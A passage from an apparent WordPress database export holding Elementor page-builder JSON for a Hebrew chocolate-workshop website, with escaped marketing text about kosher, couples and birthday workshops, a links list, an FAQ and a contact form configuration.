\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05de\\u05d7\\u05d9\\u05d9\\u05d1 \\u05dc\\u05e4\\u05d7\\u05d5\\u05ea \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05d0\\u05d7\\u05d3, \\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05dd \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d0\\u05dc\\u05d5 \\u05e9\\u05d2\\u05dd \\u05de\\u05db\\u05d9\\u05e0\\u05d9\\u05dd \\u05d0\\u05d5\\u05ea\\u05d5? \\u05db\\u05dc \\u05de\\u05e1\\u05d9\\u05d1\\u05d4 \\u05e9\\u05de\\u05e2\\u05e8\\u05d1\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05ea\\u05d4\\u05d9\\u05d4 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4 \\u05e9\\u05de\\u05d7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05db\\u05d0\\u05df \\u05d0\\u05d9\\u05df \\u05e1\\u05e4\\u05e7.<\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05de\\u05e8\\u05d9 \\u05de\\u05e1\\u05d5\\u05e8\\u05ea<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05de\\u05e7\\u05e4\\u05d9\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d7\\u05e9\\u05d5\\u05d1 \\u05e9\\u05ea\\u05d3\\u05e2\\u05d5 \\u05e9\\u05d9\\u05e9\\u05e0\\u05d4 \\u05d0\\u05d5\\u05e4\\u05e6\\u05d9\\u05d4 \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4. \\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05de\\u05d5\\u05e2\\u05d1\\u05e8\\u05d5\\u05ea \\u05d1\\u05db\\u05e9\\u05e8\\u05d5\\u05ea \\u05d7\\u05dc\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05e4\\u05e8\\u05d5\\u05d5\\u05d4, \\u05e2\\u05dc \\u05e4\\u05d9 \\u05d1\\u05d7\\u05d9\\u05e8\\u05ea\\u05db\\u05dd, \\u05db\\u05dc \\u05d4\\u05e7\\u05de\\u05d7\\u05d9\\u05dd \\u05de\\u05e0\\u05d5\\u05e4\\u05d9\\u05dd \\u05d4\\u05d9\\u05d8\\u05d1, \\u05d5\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d1\\u05e8\\u05d5 \\u05d0\\u05d9\\u05e9\\u05d5\\u05e8 \\u05e8\\u05d1\\u05e0\\u05d5\\u05ea. \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e7\\u05d1\\u05dc \\u05d0\\u05e6\\u05dc\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd \\u05e2\\u05dc \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d2\\u05dd \\u05db\\u05df. \\u05db\\u05da \\u05d0\\u05d5 \\u05db\\u05da, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/span><\\/p><h3><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e1\\u05e4\\u05d5\\u05ea<\\/span><\\/h3><ul><li><span style=\\\"text-decoration: underline; color: #000000;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/\\\">\\u05dc\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc\\u05e0\\u05d5<\\/a><\\/strong><\\/span><\\/li><li><span style=\\\"text-decoration: underline; color: #000000;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/propsal-at-chocolate-workshop\\/\\\">\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3<\\/a><\\/strong><\\/span><\\/li><li><span style=\\\"text-decoration: underline; color: #000000;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-employees\\/\\\">\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea<\\/a><\\/strong><\\/span><\\/li><li><span style=\\\"text-decoration: underline; color: #000000;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea<\\/a><\\/strong><\\/span><\\/li><li><span style=\\\"text-decoration: underline; color: #000000;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/valentine-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4<\\/a><\\/strong><\\/span><\\/li><li><span style=\\\"text-decoration: underline; color: #000000;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/kosher-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/a><\\/strong><\\/span><\\/li><li><span style=\\\"text-decoration: underline; color: #000000;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/birthday-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea<\\/a><\\/strong><\\/span><\\/li><li><span style=\\\"text-decoration: underline; color: #000000;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/strong><\\/span><\\/li><li><span style=\\\"text-decoration: underline; color: #000000;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd<\\/a><\\/strong><\\/span><\\/li><li><span style=\\\"text-decoration: underline; color: #000000;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea<\\/a><\\/strong><\\/span><\\/li><li><span style=\\\"text-decoration: underline; color: #000000;\\\"><strong><a style=\\\"color: #000000; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/family-chocolate-workshop\\/https:\\/www.chocolate4u.co.il\\/chocolate-workshops\\/family-chocolate-workshop\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea<\\/a><\\/strong><\\/span><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ebd62f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"0d02e5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b1a888a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76b1079\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ced233\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3868882\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(281,72,'_wp_page_template','elementor_canvas'),(282,72,'_elementor_edit_mode','builder'),(283,72,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea 